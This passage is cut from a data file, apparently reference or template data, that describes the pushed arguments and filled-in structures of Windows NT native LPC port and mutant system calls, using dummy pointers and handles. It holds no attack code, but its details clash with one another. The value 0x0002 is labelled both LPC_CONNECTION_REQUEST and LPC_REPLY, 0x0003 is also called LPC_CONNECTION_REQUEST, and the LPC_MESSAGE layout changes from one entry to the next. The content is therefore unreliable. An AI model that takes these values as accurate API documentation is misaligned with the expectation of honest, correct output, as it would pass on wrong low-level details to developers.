\"AbandonedState\",\r\n \"fieldType\": \"BOOLEAN\",\r\n \"fieldValue\": \"0x00\",\r\n \"fieldComment\": \"FALSE (not abandoned)\"\r\n }\r\n ]\r\n }\r\n }\r\n },\r\n \"NtReleaseMutant\": {\r\n \"ntFunc\": \"NtReleaseMutant\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0xbadd0030\",\r\n \"additionalComment\": \"Pointer to LONG PreviousCount (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000001\"\r\n },\r\n {\r\n \"value\": \"0x00000444\",\r\n \"additionalComment\": \"HANDLE MutantHandle (dummy handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtAcceptConnectPort\": {\r\n \"ntFunc\": \"NtAcceptConnectPort\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0xbadd0040\",\r\n \"additionalComment\": \"Pointer to LPC_SECTION_MEMORY ClientSharedMemory (dummy pointer)\",\r\n \"structurePointer\": \"LPC_SECTION_MEMORY\",\r\n \"structureRef\": \"struct195\",\r\n \"structureValueExpectations\": \"Describes client shared memory section.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0050\",\r\n \"additionalComment\": \"Pointer to LPC_SECTION_OWNER_MEMORY ServerSharedMemory (dummy pointer)\",\r\n \"structurePointer\": \"LPC_SECTION_OWNER_MEMORY\",\r\n \"structureRef\": \"struct196\",\r\n \"structureValueExpectations\": \"Describes server shared memory section.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000001\",\r\n \"additionalComment\": \"AcceptConnection = TRUE\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0060\",\r\n \"additionalComment\": \"Pointer to LPC_MESSAGE ConnectionReply (dummy pointer)\",\r\n \"structurePointer\": \"LPC_MESSAGE\",\r\n \"structureRef\": \"struct197\",\r\n \"structureValueExpectations\": \"Reply message structure.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000445\",\r\n \"additionalComment\": \"HANDLE AlternativeReceivePortHandle (dummy handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0070\",\r\n \"additionalComment\": \"Pointer to HANDLE ServerPortHandle (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000000\"\r\n }\r\n ],\r\n \"structures\": {\r\n \"struct195\": {\r\n \"type\": \"LPC_SECTION_MEMORY\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"Length\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x00000018\",\r\n \"fieldComment\": \"Size of LPC_SECTION_MEMORY\"\r\n },\r\n {\r\n \"fieldName\": \"SectionHandle\",\r\n \"fieldType\": \"HANDLE\",\r\n \"fieldValue\": \"0x00000446\",\r\n \"fieldComment\": \"Dummy section handle\"\r\n },\r\n {\r\n \"fieldName\": \"SectionBase\",\r\n \"fieldType\": \"PVOID\",\r\n \"fieldValue\": \"0x10000000\",\r\n \"fieldComment\": \"Base address of section\"\r\n },\r\n {\r\n \"fieldName\": \"SectionSize\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x00001000\",\r\n \"fieldComment\": \"Section size (4KB)\"\r\n }\r\n ]\r\n },\r\n \"struct196\": {\r\n \"type\": \"LPC_SECTION_OWNER_MEMORY\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"Length\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x00000020\",\r\n \"fieldComment\": \"Size of LPC_SECTION_OWNER_MEMORY\"\r\n },\r\n {\r\n \"fieldName\": \"SectionHandle\",\r\n \"fieldType\": \"HANDLE\",\r\n \"fieldValue\": \"0x00000447\",\r\n \"fieldComment\": \"Dummy section handle\"\r\n },\r\n {\r\n \"fieldName\": \"SectionBase\",\r\n \"fieldType\": \"PVOID\",\r\n \"fieldValue\": \"0x20000000\",\r\n \"fieldComment\": \"Base address of section\"\r\n },\r\n {\r\n \"fieldName\": \"SectionSize\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x00002000\",\r\n \"fieldComment\": \"Section size (8KB)\"\r\n },\r\n {\r\n \"fieldName\": \"ClientBase\",\r\n \"fieldType\": \"PVOID\",\r\n \"fieldValue\": \"0x21000000\",\r\n \"fieldComment\": \"Client base address\"\r\n },\r\n {\r\n \"fieldName\": \"ClientSize\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x00001000\",\r\n \"fieldComment\": \"Client section size (4KB)\"\r\n }\r\n ]\r\n },\r\n \"struct197\": {\r\n \"type\": \"LPC_MESSAGE\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"DataLength\",\r\n \"fieldType\": \"USHORT\",\r\n \"fieldValue\": \"0x0020\",\r\n \"fieldComment\": \"Message data length\"\r\n },\r\n {\r\n \"fieldName\": \"TotalLength\",\r\n \"fieldType\": \"USHORT\",\r\n \"fieldValue\": \"0x0030\",\r\n \"fieldComment\": \"Total message length\"\r\n },\r\n {\r\n \"fieldName\": \"Type\",\r\n \"fieldType\": \"USHORT\",\r\n \"fieldValue\": \"0x0001\",\r\n \"fieldComment\": \"Message type (LPC_REQUEST)\"\r\n },\r\n {\r\n \"fieldName\": \"DataInfoOffset\",\r\n \"fieldType\": \"USHORT\",\r\n \"fieldValue\": \"0x0000\",\r\n \"fieldComment\": \"No data info\"\r\n },\r\n {\r\n \"fieldName\": \"ClientId\",\r\n \"fieldType\": \"CLIENT_ID\",\r\n \"fieldValue\": \"0xbadd0080\",\r\n \"fieldComment\": \"Pointer to CLIENT_ID (dummy pointer)\"\r\n },\r\n {\r\n \"fieldName\": \"MessageId\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x00000001\",\r\n \"fieldComment\": \"Message identifier\"\r\n }\r\n ]\r\n }\r\n }\r\n },\r\n \"NtCompleteConnectPort\": {\r\n \"ntFunc\": \"NtCompleteConnectPort\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x00000445\",\r\n \"additionalComment\": \"HANDLE PortHandle (dummy handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtConnectPort\": {\r\n \"ntFunc\": \"NtConnectPort\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0xbadd0000\",\r\n \"additionalComment\": \"Pointer to ULONG ConnectionInfoLength (dummy pointer, typically input/output)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000020\"\r\n },\r\n {\r\n \"value\": \"0xbadd0010\",\r\n \"additionalComment\": \"Pointer to connection info buffer (dummy pointer, optional, may be None)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000000\"\r\n },\r\n {\r\n \"value\": \"0xbadd0020\",\r\n \"additionalComment\": \"Pointer to ULONG MaximumMessageLength (dummy pointer, output)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00001000\"\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"PLPC_SECTION_MEMORY ServerSharedMemory (None, optional)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"PLPC_SECTION_OWNER_MEMORY ClientSharedMemory (None, optional)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"PSECURITY_QUALITY_OF_SERVICE SecurityQos (None, optional, default for most clients)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0030\",\r\n \"additionalComment\": \"Pointer to UNICODE_STRING ServerPortName (dummy pointer, required)\",\r\n \"structurePointer\": \"UNICODE_STRING\",\r\n \"structureRef\": \"struct198\",\r\n \"structureValueExpectations\": \"UNICODE_STRING describing the LPC port name.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0040\",\r\n \"additionalComment\": \"Pointer to HANDLE ClientPortHandle (dummy pointer, output)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000000\"\r\n }\r\n ],\r\n \"structures\": {\r\n \"struct198\": {\r\n \"type\": \"UNICODE_STRING\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"Length\",\r\n \"fieldType\": \"USHORT\",\r\n \"fieldValue\": \"0x0020\",\r\n \"fieldComment\": \"Length in bytes of the string\"\r\n },\r\n {\r\n \"fieldName\": \"MaximumLength\",\r\n \"fieldType\": \"USHORT\",\r\n \"fieldValue\": \"0x0040\",\r\n \"fieldComment\": \"Maximum length in bytes\"\r\n },\r\n {\r\n \"fieldName\": \"Buffer\",\r\n \"fieldType\": \"PWSTR\",\r\n \"fieldValue\": \"0xbadd00b0\",\r\n \"fieldComment\": \"Pointer to LPC port name string (dummy pointer)\"\r\n }\r\n ]\r\n }\r\n }\r\n },\r\n \"NtCreatePort\": {\r\n \"ntFunc\": \"NtCreatePort\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"Pointer to ULONG Reserved (None, unused in user mode)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00001000\",\r\n \"additionalComment\": \"ULONG MaxDataLength (4096 bytes typical for LPC)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000200\",\r\n \"additionalComment\": \"ULONG MaxConnectInfoLength (512 bytes typical)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0050\",\r\n \"additionalComment\": \"Pointer to OBJECT_ATTRIBUTES (dummy pointer, required)\",\r\n \"structurePointer\": \"OBJECT_ATTRIBUTES\",\r\n \"structureRef\": \"struct199\",\r\n \"structureValueExpectations\": \"Length/size field; optional root directory handle; optional UNICODE_STRING object name pointer; attribute flags; optional security descriptor pointer; optional security quality of service pointer.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0060\",\r\n \"additionalComment\": \"Pointer to HANDLE PortHandle (dummy pointer, output)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000000\"\r\n }\r\n ],\r\n \"structures\": {\r\n \"struct199\": {\r\n \"type\": \"OBJECT_ATTRIBUTES\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"Length\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x00000030\",\r\n \"fieldComment\": \"Size of OBJECT_ATTRIBUTES\"\r\n },\r\n {\r\n \"fieldName\": \"RootDirectory\",\r\n \"fieldType\": \"HANDLE\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"None\"\r\n },\r\n {\r\n \"fieldName\": \"ObjectName\",\r\n \"fieldType\": \"PUNICODE_STRING\",\r\n \"fieldValue\": \"0xbadd00c0\",\r\n \"fieldComment\": \"Pointer to UNICODE_STRING (dummy pointer)\"\r\n },\r\n {\r\n \"fieldName\": \"Attributes\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x00000040\",\r\n \"fieldComment\": \"OBJ_CASE_INSENSITIVE\"\r\n },\r\n {\r\n \"fieldName\": \"SecurityDescriptor\",\r\n \"fieldType\": \"PVOID\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"None\"\r\n },\r\n {\r\n \"fieldName\": \"SecurityQualityOfService\",\r\n \"fieldType\": \"PVOID\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"None\"\r\n }\r\n ]\r\n }\r\n }\r\n },\r\n \"NtImpersonateClientOfPort\": {\r\n \"ntFunc\": \"NtImpersonateClientOfPort\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0xbadd0070\",\r\n \"additionalComment\": \"Pointer to LPC_MESSAGE Request (dummy pointer, required)\",\r\n \"structurePointer\": \"LPC_MESSAGE\",\r\n \"structureRef\": \"struct200\",\r\n \"structureValueExpectations\": \"LPC_MESSAGE structure containing client request.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000444\",\r\n \"additionalComment\": \"HANDLE PortHandle (dummy handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {\r\n \"struct200\": {\r\n \"type\": \"LPC_MESSAGE\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"DataLength\",\r\n \"fieldType\": \"USHORT\",\r\n \"fieldValue\": \"0x0010\",\r\n \"fieldComment\": \"Length of message data\"\r\n },\r\n {\r\n \"fieldName\": \"TotalLength\",\r\n \"fieldType\": \"USHORT\",\r\n \"fieldValue\": \"0x0020\",\r\n \"fieldComment\": \"Total length including header\"\r\n },\r\n {\r\n \"fieldName\": \"Type\",\r\n \"fieldType\": \"USHORT\",\r\n \"fieldValue\": \"0x0001\",\r\n \"fieldComment\": \"Message type (LPC_REQUEST)\"\r\n },\r\n {\r\n \"fieldName\": \"DataInfoOffset\",\r\n \"fieldType\": \"USHORT\",\r\n \"fieldValue\": \"0x0018\",\r\n \"fieldComment\": \"Offset to data info\"\r\n },\r\n {\r\n \"fieldName\": \"ClientId\",\r\n \"fieldType\": \"CLIENT_ID\",\r\n \"fieldValue\": \"0xbadd00d0\",\r\n \"fieldComment\": \"Pointer to CLIENT_ID (dummy pointer)\"\r\n },\r\n {\r\n \"fieldName\": \"MessageId\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x00000001\",\r\n \"fieldComment\": \"Message identifier\"\r\n }\r\n ]\r\n }\r\n }\r\n },\r\n \"NtListenPort\": {\r\n \"ntFunc\": \"NtListenPort\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0xbadd0080\",\r\n \"additionalComment\": \"Pointer to LPC_MESSAGE ConnectionRequest (dummy pointer, output)\",\r\n \"structurePointer\": \"LPC_MESSAGE\",\r\n \"structureRef\": \"struct201\",\r\n \"structureValueExpectations\": \"LPC_MESSAGE structure to receive connection request.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000444\",\r\n \"additionalComment\": \"HANDLE PortHandle (dummy handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {\r\n \"struct201\": {\r\n \"type\": \"LPC_MESSAGE\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"DataLength\",\r\n \"fieldType\": \"USHORT\",\r\n \"fieldValue\": \"0x0010\",\r\n \"fieldComment\": \"Length of message data\"\r\n },\r\n {\r\n \"fieldName\": \"TotalLength\",\r\n \"fieldType\": \"USHORT\",\r\n \"fieldValue\": \"0x0020\",\r\n \"fieldComment\": \"Total length including header\"\r\n },\r\n {\r\n \"fieldName\": \"Type\",\r\n \"fieldType\": \"USHORT\",\r\n \"fieldValue\": \"0x0002\",\r\n \"fieldComment\": \"Message type (LPC_CONNECTION_REQUEST)\"\r\n },\r\n {\r\n \"fieldName\": \"DataInfoOffset\",\r\n \"fieldType\": \"USHORT\",\r\n \"fieldValue\": \"0x0018\",\r\n \"fieldComment\": \"Offset to data info\"\r\n },\r\n {\r\n \"fieldName\": \"ClientId\",\r\n \"fieldType\": \"CLIENT_ID\",\r\n \"fieldValue\": \"0xbadd00e0\",\r\n \"fieldComment\": \"Pointer to CLIENT_ID (dummy pointer)\"\r\n },\r\n {\r\n \"fieldName\": \"MessageId\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x00000002\",\r\n \"fieldComment\": \"Message identifier\"\r\n }\r\n ]\r\n }\r\n }\r\n },\r\n \"NtQueryInformationPort\": {\r\n \"ntFunc\": \"NtQueryInformationPort\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0xbadd0090\",\r\n \"additionalComment\": \"Pointer to ULONG ResultLength (dummy pointer, output)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000010\"\r\n },\r\n {\r\n \"value\": \"0x00000010\",\r\n \"additionalComment\": \"ULONG Length (16 bytes typical for PORT_BASIC_INFORMATION)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd00a0\",\r\n \"additionalComment\": \"Pointer to PORT_INFORMATION buffer (dummy pointer, output)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000000\"\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"PORT_INFORMATION_CLASS PortInformationClass (PortBasicInformation)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000444\",\r\n \"additionalComment\": \"HANDLE PortHandle (dummy handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtReadRequestData\": {\r\n \"ntFunc\": \"NtReadRequestData\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0xbadd0000\",\r\n \"additionalComment\": \"Pointer to ULONG ResultLength (dummy pointer, typically receives number of bytes read)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000020\"\r\n },\r\n {\r\n \"value\": \"0x00000020\",\r\n \"additionalComment\": \"ULONG Length (number of bytes to read, e.g., 32 bytes)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0010\",\r\n \"additionalComment\": \"Pointer to buffer (dummy pointer, receives data)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0xdeadbeef\"\r\n },\r\n {\r\n \"value\": \"0x00000001\",\r\n \"additionalComment\": \"ULONG DataIndex (index of data to read, e.g., 1)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0020\",\r\n \"additionalComment\": \"Pointer to LPC_MESSAGE Request (dummy pointer)\",\r\n \"structurePointer\": \"LPC_MESSAGE\",\r\n \"structureRef\": \"struct202\",\r\n \"structureValueExpectations\": \"Message header and data fields for the request.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000444\",\r\n \"additionalComment\": \"HANDLE PortHandle (dummy handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {\r\n \"struct202\": {\r\n \"type\": \"LPC_MESSAGE\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"DataLength\",\r\n \"fieldType\": \"USHORT\",\r\n \"fieldValue\": \"0x0020\",\r\n \"fieldComment\": \"Length of data in message (32 bytes)\"\r\n },\r\n {\r\n \"fieldName\": \"TotalLength\",\r\n \"fieldType\": \"USHORT\",\r\n \"fieldValue\": \"0x0030\",\r\n \"fieldComment\": \"Total length including header\"\r\n },\r\n {\r\n \"fieldName\": \"Type\",\r\n \"fieldType\": \"USHORT\",\r\n \"fieldValue\": \"0x0001\",\r\n \"fieldComment\": \"Message type (e.g., LPC_REQUEST)\"\r\n },\r\n {\r\n \"fieldName\": \"DataInfoOffset\",\r\n \"fieldType\": \"USHORT\",\r\n \"fieldValue\": \"0x0010\",\r\n \"fieldComment\": \"Offset to data info\"\r\n },\r\n {\r\n \"fieldName\": \"ClientId\",\r\n \"fieldType\": \"CLIENT_ID\",\r\n \"fieldValue\": \"0xbadd0090\",\r\n \"fieldComment\": \"Pointer to CLIENT_ID (dummy pointer)\"\r\n },\r\n {\r\n \"fieldName\": \"MessageId\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x00000001\",\r\n \"fieldComment\": \"Message identifier\"\r\n },\r\n {\r\n \"fieldName\": \"SectionSize\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"Unused in this example\"\r\n }\r\n ]\r\n }\r\n }\r\n },\r\n \"NtReplyPort\": {\r\n \"ntFunc\": \"NtReplyPort\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0xbadd0030\",\r\n \"additionalComment\": \"Pointer to LPC_MESSAGE Reply (dummy pointer)\",\r\n \"structurePointer\": \"LPC_MESSAGE\",\r\n \"structureRef\": \"struct203\",\r\n \"structureValueExpectations\": \"Message header and data fields for the reply.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000445\",\r\n \"additionalComment\": \"HANDLE PortHandle (dummy handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {\r\n \"struct203\": {\r\n \"type\": \"LPC_MESSAGE\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"DataLength\",\r\n \"fieldType\": \"USHORT\",\r\n \"fieldValue\": \"0x0010\",\r\n \"fieldComment\": \"Length of data in message (16 bytes)\"\r\n },\r\n {\r\n \"fieldName\": \"TotalLength\",\r\n \"fieldType\": \"USHORT\",\r\n \"fieldValue\": \"0x0020\",\r\n \"fieldComment\": \"Total length including header\"\r\n },\r\n {\r\n \"fieldName\": \"Type\",\r\n \"fieldType\": \"USHORT\",\r\n \"fieldValue\": \"0x0002\",\r\n \"fieldComment\": \"Message type (e.g., LPC_REPLY)\"\r\n },\r\n {\r\n \"fieldName\": \"DataInfoOffset\",\r\n \"fieldType\": \"USHORT\",\r\n \"fieldValue\": \"0x0008\",\r\n \"fieldComment\": \"Offset to data info\"\r\n },\r\n {\r\n \"fieldName\": \"ClientId\",\r\n \"fieldType\": \"CLIENT_ID\",\r\n \"fieldValue\": \"0xbadd00a0\",\r\n \"fieldComment\": \"Pointer to CLIENT_ID (dummy pointer)\"\r\n },\r\n {\r\n \"fieldName\": \"MessageId\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x00000002\",\r\n \"fieldComment\": \"Message identifier\"\r\n },\r\n {\r\n \"fieldName\": \"SectionSize\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"Unused in this example\"\r\n }\r\n ]\r\n }\r\n }\r\n },\r\n \"NtReplyWaitReceivePort\": {\r\n \"ntFunc\": \"NtReplyWaitReceivePort\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0xbadd0040\",\r\n \"additionalComment\": \"Pointer to LPC_MESSAGE IncomingRequest (dummy pointer)\",\r\n \"structurePointer\": \"LPC_MESSAGE\",\r\n \"structureRef\": \"struct204\",\r\n \"structureValueExpectations\": \"Message header and data fields for the incoming request.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0050\",\r\n \"additionalComment\": \"Pointer to LPC_MESSAGE Reply (dummy pointer)\",\r\n \"structurePointer\": \"LPC_MESSAGE\",\r\n \"structureRef\": \"struct205\",\r\n \"structureValueExpectations\": \"Message header and data fields for the reply.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0060\",\r\n \"additionalComment\": \"Pointer to HANDLE ReceivePortHandle (dummy pointer, receives handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000446\"\r\n },\r\n {\r\n \"value\": \"0x00000446\",\r\n \"additionalComment\": \"HANDLE PortHandle (dummy handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {\r\n \"struct204\": {\r\n \"type\": \"LPC_MESSAGE\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"DataLength\",\r\n \"fieldType\": \"USHORT\",\r\n \"fieldValue\": \"0x0018\",\r\n \"fieldComment\": \"Length of data in message (24 bytes)\"\r\n },\r\n {\r\n \"fieldName\": \"TotalLength\",\r\n \"fieldType\": \"USHORT\",\r\n \"fieldValue\": \"0x0028\",\r\n \"fieldComment\": \"Total length including header\"\r\n },\r\n {\r\n \"fieldName\": \"Type\",\r\n \"fieldType\": \"USHORT\",\r\n \"fieldValue\": \"0x0003\",\r\n \"fieldComment\": \"Message type (e.g., LPC_CONNECTION_REQUEST)\"\r\n },\r\n {\r\n \"fieldName\": \"DataInfoOffset\",\r\n \"fieldType\": \"USHORT\",\r\n \"fieldValue\": \"0x0010\",\r\n \"fieldComment\": \"Offset to data info\"\r\n },\r\n {\r\n \"fieldName\": \"ClientId\",\r\n \"fieldType\": \"CLIENT_ID\",\r\n \"fieldValue\": \"0xbadd00b0\",\r\n \"fieldComment\": \"Pointer to CLIENT_ID (dummy pointer)\"\r\n },\r\n {\r\n \"fieldName\": \"MessageId\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x00000003\",\r\n \"fieldComment\": \"Message identifier\"\r\n },\r\n {\r\n \"fieldName\": \"SectionSize\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"Unused in this example\"\r\n }\r\n ]\r\n },\r\n \"struct205\": {\r\n \"type\": \"LPC_MESSAGE\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"DataLength\",\r\n \"fieldType\": \"USHORT\",\r\n \"fieldValue\": \"0x0010\",\r\n \"fieldComment\": \"Length of data in message (16 bytes)\"\r\n },\r\n {\r\n \"fieldName\": \"TotalLength\",\r\n \"fieldType\": \"USHORT\",\r\n \"fieldValue\": \"0x0020\",\r\n \"fieldComment\": \"Total length including header\"\r\n },\r\n {\r\n \"fieldName\": \"Type\",\r\n \"fieldType\": \"USHORT\",\r\n \"fieldValue\": \"0x0002\",\r\n \"fieldComment\": \"Message type (e.g., LPC_REPLY)\"\r\n },\r\n {\r\n \"fieldName\": \"DataInfoOffset\",\r\n \"fieldType\": \"USHORT\",\r\n \"fieldValue\": \"0x0008\",\r\n \"fieldComment\": \"Offset to data info\"\r\n },\r\n {\r\n \"fieldName\": \"ClientId\",\r\n \"fieldType\": \"CLIENT_ID\",\r\n \"fieldValue\": \"0xbadd00c0\",\r\n \"fieldComment\": \"Pointer to CLIENT_ID (dummy pointer)\"\r\n },\r\n {\r\n \"fieldName\": \"MessageId\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x00000004\",\r\n \"fieldComment\": \"Message identifier\"\r\n },\r\n {\r\n \"fieldName\": \"SectionSize\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"Unused in this example\"\r\n }\r\n ]\r\n }\r\n }\r\n },\r\n \"NtReplyWaitReplyPort\": {\r\n \"ntFunc\": \"NtReplyWaitReplyPort\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0xbadd0070\",\r\n \"additionalComment\": \"Pointer to LPC_MESSAGE Reply (dummy pointer)\",\r\n \"structurePointer\": \"LPC_MESSAGE\",\r\n \"structureRef\": \"struct206\",\r\n \"structureValueExpectations\": \"Message header and data fields for the reply.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000447\",\r\n \"additionalComment\": \"HANDLE PortHandle (dummy handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {\r\n \"struct206\": {\r\n \"type\": \"LPC_MESSAGE\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"DataLength\",\r\n \"fieldType\": \"USHORT\",\r\n \"fieldValue\": \"0x0010\",\r\n \"fieldComment\": \"Length of data in message (16 bytes)\"\r\n },\r\n {\r\n \"fieldName\": \"TotalLength\",\r\n \"fieldType\": \"USHORT\",\r\n \"fieldValue\": 